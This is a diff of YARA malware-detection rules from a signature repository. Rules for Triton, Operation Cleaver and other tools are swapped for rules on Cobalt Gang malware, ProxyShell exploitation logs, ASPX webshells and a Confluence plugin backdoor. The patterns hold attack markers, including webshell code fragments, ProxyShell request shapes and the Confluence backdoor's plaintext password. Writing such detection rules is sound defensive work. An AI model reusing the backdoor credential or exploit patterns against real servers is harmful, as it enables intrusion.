+		reference = "https://sslbl.abuse.ch/intel/6ece5ece4192683d2d84e25b0ba7e04f9cb7eb7c"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cobaltgang.yar#L41-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b628c7e6debdd2b21a321dc2ec5838fd56107f4cac21bda8b9faa1c1d5b23b71"
-		score = 60
+		logic_hash = "46077106bd19dd38a714a220b887742f5a29424ac8eb89f469975f863b3782ec"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1831806fc27d496f0f9dcfd8402724189deaeb5f8bcf0118f3d6484d0bdee9ed"
+		hash1 = "6d70673b723f338b3febc9f1d69463bdd4775539cb92b5a5d8fccc0d977fa2f0"
 
 	strings:
-		$x2 = "\\Ammyy\\sources\\main\\Downloader.cpp" ascii
+		$s1 = "ServerSocket.EXE" fullword wide
+		$s2 = "Incorrect version of WS2_32.dll found" fullword ascii
+		$s3 = "Click 'Connect' to Connect to the Server.  'Disconnect' to disconnect from server." fullword wide
+		$s4 = "Click 'Start' to start the Server.  'Stop' to Stop it." fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of them )
 }
-rule SIGNATURE_BASE_Triton_Trilog : FILE
+rule SIGNATURE_BASE_Cobaltgang_Malware_Aug17_2 : FILE
 {
 	meta:
-		description = "Detects Triton APT malware - file trilog.exe"
+		description = "Detects a Cobalt Gang malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ae2c9b47-2a67-50c6-9d2a-dc47b4fa69ef"
-		date = "2017-12-14"
+		id = "2839c119-0fa4-51f0-a406-5d381cc594a2"
+		date = "2017-08-09"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/vtQoCQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_triton.yar#L70-L85"
+		reference = "https://sslbl.abuse.ch/intel/6ece5ece4192683d2d84e25b0ba7e04f9cb7eb7c"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cobaltgang.yar#L59-L72"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6406e9e7651978a6817079945dc801afdb6c16dd107527cbfd9a946eca27a51a"
+		logic_hash = "54095d2f447b6478aefe956133fb9b97171c1e07d7d9186a70bf242a094e4156"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e8542c07b2af63ee7e72ce5d97d91036c5da56e2b091aa2afe737b224305d230"
+		hash1 = "80791d5e76782cc3cd14f37f351e33b860818784192ab5b650f1cdf4f131cf72"
 
 	strings:
-		$s1 = "inject.bin" ascii
-		$s2 = "PYTHON27.DLL" fullword ascii
-		$s3 = "payload" ascii
+		$s1 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; BOIE9;ENGB)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
 }
-rule SIGNATURE_BASE_SUSP_Macos_Plist_Suspicious : FILE
-{
-	meta:
-		description = "Suspicious PLIST files in MacOS (possible malware persistence)"
-		author = "John Lambert @JohnLaTwC"
-		id = "61b5986d-35c9-5e1a-a077-14cecdbed36f"
-		date = "2018-12-14"
-		modified = "2025-03-21"
-		old_rule_name = "gen_malware_MacOS_plist_suspicious"
-		reference = "https://objective-see.com/blog/blog_0x3A.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_malware_MacOS_plist_suspicious.yar#L1-L67"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1cca4b859148d95c9e150116e08230424544ebd0886a4d152e493476b9f91a75"
-		score = 60
-		quality = 83
-		tags = "FILE"
-		hash1 = "0541fc6a11f4226d52ae3d4158deb8f50ed61b25bb5f889d446102e1ee57b76d"
-		hash2 = "6cc6abec7d203f99c43ce16630edc39451428d280b02739757f17fd01fc7dca3"
-		hash3 = "76eb97aba93979be06dbf0a872518f9514d0bb20b680c887d6fd5cc79dce3681"
-		hash4 = "8921e3f1955f7141d1231f8cfd95230143525f259e578fdc1dd98494f62ec4a1"
-		hash5 = "9a3fd0d2b0bca7d2f7e3c70cb15a7005a1afa1ce78371fd3fa9c526a288b64ce"
-		hash6 = "737355121685afc38854413d8a1657886f9aa24f54673953749386defe843017"
-		hash7 = "9b77622653934995ee8bb5562df311f5bb6d6719933e2671fe231a664da76d30"
-		hash8 = "c449f8115b4b939271cb92008a497457e1ab1cf2cbd8f4b58f7ba955cf5624f0"
-		hash9 = "cdb2fb9c8e84f0140824403ec32a2431fb357cd0f184c1790152834cc3ad3c1b"
-
-	strings:
-		$sr1 = "PropertyList-"
-		$sr2 = "<plist"
-		$p1 = "python" ascii
-		$p2 = "<string>-c" ascii
-		$v0 = /\<string\>[\/|\w]{0,20}\+[\/|\+|=|\w]{59,80}\<\/string\>/
-		$v1 = "curl " fullword
-		$v2 = "PAYLOAD_DATA"
-		$v3 = "base64"
-		$vb640 = /(AAQQBZAEwATwBBAEQAXwBCAEEAUwBFADYANA|AEEAWQBMAE8AQQBEAF8AQgBBAFMARQA2ADQA|BBWUxPQURfQkFTRTY0|QVlMT0FEX0JBU0U2N|UABBAFkATABPAEEARABfAEIAQQBTAEUANgA0A|UEFZTE9BRF9CQVNFNj)/
-		$vb641 = /(AHUAYgBwAHIAbwBjAGUAcwBzA|c3VicHJvY2Vzc|cwB1AGIAcAByAG8AYwBlAHMAcw|dWJwcm9jZXNz|MAdQBiAHAAcgBvAGMAZQBzAHMA|N1YnByb2Nlc3)/
-		$vb642 = "IyEvdXNy"
-		$vb643 = "IyAtKi0"
-		$vb644 = /(AGQAZABfAGgAZQBhAGQAZQByA|EAZABkAF8AaABlAGEAZABlAHIA|FkZF9oZWFkZX|YQBkAGQAXwBoAGUAYQBkAGUAcg|YWRkX2hlYWRlc|ZGRfaGVhZGVy)/
-		$fp1 = "&#10;do&#10;&#09;echo"
-		$fp2 = "<string>com.cisco.base64</string>"
-		$fp3 = "video/mp4;base64"
-		$fp4 = "<key>Content-Length</key>"
-		$fp5 = "<string>yara</string>"
-		$fp6 = "<key>Frameworks/base64.framework</key>" ascii
-		$fp7 = "<key>Headers/base64.h</key>" ascii
-		$fp8 = "database64" ascii fullword
-		$fp9 = "<!-- last arg will be replaced by the installer script -->" ascii
-		$fp10 = "<key>/usr/local/bin/python</key>"
-		$fp11 = "<key>/usr/bin/ruby</key>"
 
-	condition:
-		filesize < 20KB and uint32be( 0 ) == 0x3c3f786d and all of ( $sr* ) and @sr2 [ 1 ] < 0x100 and ( 1 of ( $v* ) or all of ( $p* ) ) and not 1 of ( $fp* )
-}
-rule SIGNATURE_BASE_Gen_Unicorn_Obfuscated_Powershell : FILE
+rule SIGNATURE_BASE_MAL_CRIME_Cobaltgang_Malware_Oct19_1 : FILE
 {
 	meta:
-		description = "PowerShell payload obfuscated by Unicorn toolkit"
-		author = "John Lambert @JohnLaTwC"
-		id = "0235795b-6d0b-5bba-8ae6-606c3b613c86"
-		date = "2018-04-03"
+		description = "Detects CobaltGang malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "95c16016-b09b-56f3-b5a4-fca18ac70ad5"
+		date = "2019-10-24"
 		modified = "2023-12-05"
-		reference = "https://github.com/trustedsec/unicorn/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_unicorn_obfuscated_powershell.yar#L1-L26"
+		reference = "https://twitter.com/vxsh4d0w/status/1187353649015611392"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cobaltgang.yar#L74-L95"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b93d2fe6a671a6a967f31d5b3a0a16d4f93abcaf25188a2bbdc0894087adb10d"
-		logic_hash = "cb0044d5ee146213c96161d52880ce6c20d5884d57620c73f359673d4ae4b76b"
+		logic_hash = "4bd57aa6929b3eced7dee8063d89c542f2c80f802ef40efc23bbea6cc8ffd98c"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash2 = "1afb9795cb489abce39f685a420147a2875303a07c32bf7eec398125300a460b"
+		hash1 = "72125933265f884ceb8ab64ab303ea76aaeb7877faee8976d398acd0d0b7356b"
+		hash2 = "893339624602c7b3a6f481aed9509b53e4e995d6771c72d726ba5a6b319608a7"
+		hash3 = "3c34bbf641df25f9accd05b27b9058e25554fdfea0e879f5ca21ffa460ad2b01"
 
 	strings:
-		$h1 = "powershell"
-		$sa1 = ".value.toString() 'JAB"
-		$sa2 = ".value.toString() ('JAB"
-		$sb1 = "-w 1 -C \"s"
-		$sb2 = "/w 1 /C \"s"
+		$op_a1 = { 0f 44 c2 eb 0a 31 c0 80 fa 20 0f 94 c0 01 c0 5d }
+		$op_b1 = { 89 e5 53 8b 55 08 8b 4d 0c 8a 1c 01 88 1c 02 83 }
+		$op_b2 = { 89 e5 53 8b 55 08 8b 45 0c 8a 1c 0a 88 1c 08 83 }
 
 	condition:
-		filesize < 20KB and uint32be( 0 ) == 0x706f7765 and $h1 at 0 and ( uint16be( filesize -2 ) == 0x2722 or ( uint16be( filesize -2 ) == 0x220a and uint8( filesize -3 ) == 0x27 ) or ( uint16be( filesize -2 ) == 0x2922 and uint8( filesize -3 ) == 0x27 ) ) and ( 1 of ( $sa* ) and 1 of ( $sb* ) )
+		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and ( pe.imphash ( ) == "d1e3f8d02cce09520379e5c1e72f862f" or pe.imphash ( ) == "8e26df99c70f79cb8b1ea2ef6f8e52ac" or ( $op_a1 and 1 of ( $op_b* ) ) )
 }
-rule SIGNATURE_BASE_VULN_Dell_BIOS_Update_Driver_Dbutil_May21 : CVE_2021_21551 FILE
+rule SIGNATURE_BASE_VULN_Confluence_Questions_Plugin_CVE_2022_26138_Jul22_1 : CVE_2022_26138
 {
 	meta:
-		description = "Detects vulnerable DELL BIOS update driver that allows privilege escalation as reported in CVE-2021-21551 - DBUtil_2_3.Sys - note: it's usual location is in the C:\\Windows\\Temp folder"
+		description = "Detects properties file of Confluence Questions plugin with static user name and password (backdoor) CVE-2022-26138"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6d46866e-40fb-5fbf-b159-6bf688e638cb"
-		date = "2021-05-05"
-		modified = "2023-12-05"
-		reference = "https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_dell_bios_upd_driver.yar#L2-L18"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9cefb9fe28e818a3b0bc1c9ac570ddf2fac7ebf23408963656b7ec86d5bf3224"
-		score = 60
-		quality = 85
-		tags = "CVE-2021-21551, FILE"
-		hash1 = "0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5"
-		hash2 = "ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1"
-
-	strings:
-		$s1 = "\\DBUtilDrv2" ascii
-		$s2 = "DBUtil_2_3.Sys" ascii fullword
-		$s3 = "[ Dell BIOS Utility Driver - " ascii fullword
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
-}
-rule SIGNATURE_BASE_OPCLEAVER_Backdoorlogger
-{
-	meta:
-		description = "Keylogger used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "e9149baa-83c0-597f-833c-ea0241bb60e6"
-		date = "2014-12-02"
+		id = "1443c673-2a86-5431-876a-c8fccba52190"
+		date = "2022-07-21"
 		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L3-L17"
+		reference = "https://www.bleepingcomputer.com/news/security/atlassian-fixes-critical-confluence-hardcoded-credentials-flaw/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_confluence_questions_plugin_cve_2022_26138.yar#L2-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c7716b21e85d7e9fb1e1503071c6cd7dc2f4713051e0b03013e3d123a0d800a6"
-		score = 70
+		logic_hash = "c164bd3d9ed1e155d51112e14340b814f6ea782604540c84a6e9efb5c6041156"
+		score = 50
 		quality = 85
-		tags = ""
+		tags = "CVE-2022-26138"
 
 	strings:
-		$s1 = "BackDoorLogger"
-		$s2 = "zhuAddress"
+		$x_plain_1 = "predefined.user.password=disabled1system1user6708"
+		$jar_marker = "/confluence/plugins/questions/"
+		$jar_size_1 = { 00 CC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+      /*    here starts default.properties v                          */
+                      ?? ?? ?? ?? ?? ?? 00 64 65 66 61 75 6C 74 2E 70
+                      72 6F 70 65 72 74 69 65 73 50 4B }
+		$jar_size_2 = { 00 CC 00 ?? ?? ?? ?? ?? 00 64 65 66 61 75 6C 74
+                      2E 70 72 6F 70 65 72 74 69 65 73 }
 
 	condition:
-		all of them
+		1 of ( $x* ) or ( $jar_marker and 1 of ( $jar_size* ) )
 }
-rule SIGNATURE_BASE_OPCLEAVER_Jasus
+rule SIGNATURE_BASE_EXPL_Exchange_Proxyshell_Failed_Aug21_1 : SCRIPT
 {
 	meta:
-		description = "ARP cache poisoner used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "8e04b258-e071-5974-9778-b9d0b97be8d5"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L19-L34"
+		description = "Detects ProxyShell exploitation attempts in log files"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9b849042-8918-5322-a35a-2165d4b541d5"
+		date = "2021-08-08"
+		modified = "2021-08-09"
+		reference = "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7d6cd7f0f264a0bfdc6af422baa1a0e257cb8f4c39a2cb27a1edaf70201e8564"
-		score = 70
-		quality = 85
-		tags = ""
+		logic_hash = "690e74633ac8671727fe47f6398e536c1b7a4ac469d27d3f7507c75e175716bd"
+		score = 50
+		quality = 60
+		tags = "SCRIPT"
 
 	strings:
-		$s1 = "pcap_dump_open"
-		$s2 = "Resolving IPs to poison..."
-		$s3 = "WARNNING: Gateway IP can not be found"
+		$xr1 = / \/autodiscover\/autodiscover\.json[^\n]{1,300}\/(powershell|mapi\/nspi|EWS\/|X-Rps-CAT)[^\n]{1,400}401 0 0/ nocase ascii
+		$xr3 = /Email=autodiscover\/autodiscover\.json[^\n]{1,400}401 0 0/ nocase ascii
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_OPCLEAVER_Loggermodule
+rule SIGNATURE_BASE_EXPL_Exchange_Proxyshell_Successful_Aug21_1 : SCRIPT
 {
 	meta:
-		description = "Keylogger used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "949e7ff4-2102-5c89-83c9-f7ba64745661"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L36-L50"
+		description = "Detects successful ProxyShell exploitation attempts in log files"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8c11cd1a-6d3f-5f29-af61-17179b01ca8b"
+		date = "2021-08-08"
+		modified = "2025-03-21"
+		reference = "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L18-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dd937bc3fc7054874a3c61bbef859dd8a8ec37872a30be6d3e1776957f98db80"
-		score = 70
-		quality = 85
-		tags = ""
+		logic_hash = "06ab609a8efe3b36b6356a9cf7b7b11b2fc2a556ec1df6995008a9df86b3fcee"
+		score = 65
+		quality = 83
+		tags = "SCRIPT"
 
 	strings:
-		$s1 = "%s-%02d%02d%02d%02d%02d.r"
-		$s2 = "C:\\Users\\%s\\AppData\\Cookies\\"
+		$xr1a = / \/autodiscover\/autodiscover\.json[^\n]{1,300}\/(powershell|X-Rps-CAT)/ nocase ascii
+		$xr1b = / \/autodiscover\/autodiscover\.json[^\n]{1,300}\/(mapi\/nspi|EWS\/)[^\n]{1,400}(200|302) 0 0/
+		$xr2 = /autodiscover\/autodiscover\.json[^\n]{1,60}&X-Rps-CAT=/ nocase ascii
+		$xr3 = /Email=autodiscover\/autodiscover\.json[^\n]{1,400}200 0 0/ nocase ascii
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_OPCLEAVER_Netc
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Proxyshell_Aug21_2 : FILE
 {
 	meta:
-		description = "Net Crawler used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "68f32662-0d7d-5dfa-8bfd-ca41d383e19c"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L52-L66"
+		description = "Detects webshells dropped by ProxyShell exploitation based on their file header (must be PST), size and content"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a351a466-695e-570e-8c7f-9c6c0534839c"
+		date = "2021-08-13"
+		modified = "2025-03-21"
+		reference = "https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-servers-are-getting-hacked-via-proxyshell-exploits/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L36-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7da739c33da91f07e9e35ceab88a37477372998b4cf4b692b8d26cd1a4d936de"
-		score = 70
+		logic_hash = "4ede197d482f0a9e553ba857b5049e7b7405e3df92460e19418fa0653c844982"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "NetC.exe" wide
-		$s2 = "Net Service"
+		$s1 = "Page Language=" ascii nocase
 
 	condition:
-		all of them
+		uint32( 0 ) == 0x4e444221 and filesize < 2MB and $s1
 }
-rule SIGNATURE_BASE_OPCLEAVER_Shellcreator2
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Proxyshell_Aug21_3 : FILE
 {
 	meta:
-		description = "Shell Creator used by attackers in Operation Cleaver to create ASPX web shells"
-		author = "Cylance Inc."
-		id = "b62336c3-39e5-55f8-98df-6c2a2cb0764a"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L68-L82"
+		description = "Detects webshells dropped by ProxyShell exploitation based on their file header (must be DER), size and content"
+		author = "Max Altgelt"
+		id = "a7bca62b-c8f1-5a38-81df-f3d4582a590b"
+		date = "2021-08-23"
+		modified = "2025-03-21"
+		reference = "https://twitter.com/gossithedog/status/1429175908905127938?s=12"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L51-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5422cf4e4809c1183c3c9870d9a5ddcf806082d8cae81a014255f5f18576101d"
-		score = 70
+		logic_hash = "f071aaa8918b359f786f2ac7447eeaedb5a6fca9e0a0c0e8820e011244424503"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "ShellCreator2.Properties"
-		$s2 = "set_IV"
+		$s1 = "Page Language=" ascii nocase
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x8230 and filesize < 10KB and $s1
 }
-rule SIGNATURE_BASE_OPCLEAVER_Smartcopy2
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Proxyshell_Sep21_1 : FILE
 {
 	meta:
-		description = "Malware or hack tool used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "898d9060-208a-5dfb-a452-50ab49b80a9d"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L84-L98"
+		description = "Detects webshells dropped by ProxyShell exploitation based on their file header (must be PST) and base64 decoded request"
+		author = "Tobias Michalski"
+		id = "d0d23e17-6b6a-51d1-afd9-59cc2404bcd8"
+		date = "2021-09-17"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L67-L81"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5b83588fa80558cd387511d38e9d1c51c488216b9cd27e848d8bdc59cd8ce348"
-		score = 70
+		hash = "219468c10d2b9d61a8ae70dc8b6d2824ca8fbe4e53bbd925eeca270fef0fd640"
+		logic_hash = "233ec15dff8da5f2beaa931eb06849aa37e548947c1068d688a1695d977605d8"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "SmartCopy2.Properties"
-		$s2 = "ZhuFrameWork"
+		$s = ".FromBase64String(Request["
 
 	condition:
-		all of them
+		uint32( 0 ) == 0x4e444221 and any of them
 }
-rule SIGNATURE_BASE_OPCLEAVER_Synflooder
+rule SIGNATURE_BASE_APT_IIS_Config_Proxyshell_Artifacts : FILE
 {
 	meta:
-		description = "Malware or hack tool used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "bdaf02f4-1226-569b-9f55-999be7ff397a"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L100-L115"
+		description = "Detects virtual directory configured in IIS pointing to a ProgramData folder (as found in attacks against Exchange servers in August 2021)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "21888fc0-82c6-555a-9320-9cbb8332a843"
+		date = "2021-08-25"
+		modified = "2025-03-21"
+		reference = "https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L83-L106"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b5349931c4eb5733f9bf05e7cfac6a434063a01d802665f70384cb29d9ae2a3d"
-		score = 70
+		logic_hash = "a4557694629448d258b8b2fefc278e059217560e7a0ec3279863a16fb9b3989c"
+		score = 90
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "Unable to resolve [ %s ]. ErrorCode %d"
-		$s2 = "s IP is : %s"
-		$s3 = "Raw TCP Socket Created successfully."
+		$a1 = "<site name=" ascii
+		$a2 = "<sectionGroup name=\"system.webServer\">" ascii
+		$sa1 = " physicalPath=\"C:\\ProgramData\\COM" ascii
+		$sa2 = " physicalPath=\"C:\\ProgramData\\WHO" ascii
+		$sa3 = " physicalPath=\"C:\\ProgramData\\ZING" ascii
+		$sa4 = " physicalPath=\"C:\\ProgramData\\ZOO" ascii
+		$sa5 = " physicalPath=\"C:\\ProgramData\\XYZ" ascii
+		$sa6 = " physicalPath=\"C:\\ProgramData\\AUX" ascii
+		$sa7 = " physicalPath=\"C:\\ProgramData\\CON\\" ascii
+		$sb1 = " physicalPath=\"C:\\Users\\All Users\\" ascii
 
 	condition:
-		all of them
+		filesize < 500KB and all of ( $a* ) and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_OPCLEAVER_Tinyzbot
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Proxyshell_Exploitation_Aug21_1 : FILE
 {
 	meta:
-		description = "Tiny Bot used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "4fad21a6-a900-5afb-876d-99a6d93e0c2c"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L117-L138"
+		description = "Detects unknown malicious loaders noticed in August 2021"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1fa563fc-c91c-5f4e-98f1-b895e1acb4f4"
+		date = "2021-08-25"
+		modified = "2025-03-21"
+		reference = "https://twitter.com/VirITeXplorer/status/1430206853733097473"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L108-L120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fdc41fbec71602e13105a03a4f44319a139018bda00e87e8f4d9b5e2f6269c14"
-		score = 70
+		logic_hash = "8a2417bb85c7f91d98143d2f4c26d30416b3a01ba8abc1445ccfae5609825b4d"
+		score = 90
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "NetScp" wide
-		$s2 = "TinyZBot.Properties.Resources.resources"
-		$s3 = "Aoao WaterMark"
-		$s4 = "Run_a_exe"
-		$s5 = "netscp.exe"
-		$s6 = "get_MainModule_WebReference_DefaultWS"
-		$s7 = "remove_CheckFileMD5Completed"
-		$s8 = "http://tempuri.org/"
-		$s9 = "Zhoupin_Cleaver"
+		$x1 = ");eval/*asf" ascii
 
 	condition:
-		(( $s1 and $s2 ) or ( $s3 and $s4 and $s5 ) or ( $s6 and $s7 and $s8 ) or $s9 )
+		filesize < 600KB and 1 of them
 }
-rule SIGNATURE_BASE_OPCLEAVER_Zhoupinexploitcrew
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Proxyshell_Aug15 : FILE
 {
 	meta:
-		description = "Keywords used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "4e7457a0-e6e1-535c-b04b-ad313b496ce1"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L140-L154"
+		description = "Webshells iisstart.aspx and Logout.aspx"
+		author = "Moritz Oettle"
+		id = "b1e6c0f3-787f-59b8-8123-4045522047ca"
+		date = "2021-09-04"
+		modified = "2025-03-21"
+		reference = "https://github.com/hvs-consulting/ioc_signatures/tree/main/Proxyshell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L122-L146"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1541f1ebc026d3eaf9b62150085415d12523ee1395fb8cf7ade8608a1b0a11b6"
-		score = 70
+		logic_hash = "7e2e2f9add5932d28074a252a8e326dd728442df28abc02e8d026d773dd4aa05"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "zhoupin exploit crew" nocase
-		$s2 = "zhopin exploit crew" nocase
+		$g1 = "language=\"JScript\"" ascii
+		$g2 = "function getErrorWord" ascii
